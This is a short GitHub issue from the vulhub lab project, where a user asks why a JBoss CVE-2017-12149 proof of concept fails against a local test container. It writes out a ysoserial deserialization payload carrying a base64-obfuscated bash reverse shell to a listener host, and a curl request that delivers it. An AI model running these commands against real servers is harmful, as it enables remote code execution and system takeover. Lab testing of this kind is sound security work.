### ISSUE TITLE
Error with POC Check of jboss-CVE-2017-12149

### ISSUE THREAD

**Issue by xx-zhang** [vulhub/vulhub#217]
## penhost run 
```bash
docker run --rm -t      registry.cn-shenzhen.aliyuncs.com/rapid7/ysoserial:v1 CommonsCollections5       "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjEuNy4xNDQvMTQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" > ttt.ser

curl -X POST  http://172.21.7.166:38080/invoker/readonly  --data-binary @ttt.ser
```

## host 172.21.7.166

```yaml
version: '2'
services:
  jboss:
    image: vulhub/jboss:as-6.1.0
    restart: always
    ports:
      - "39990:9990"
      - "38080:8080"
```

why it doesn't mater
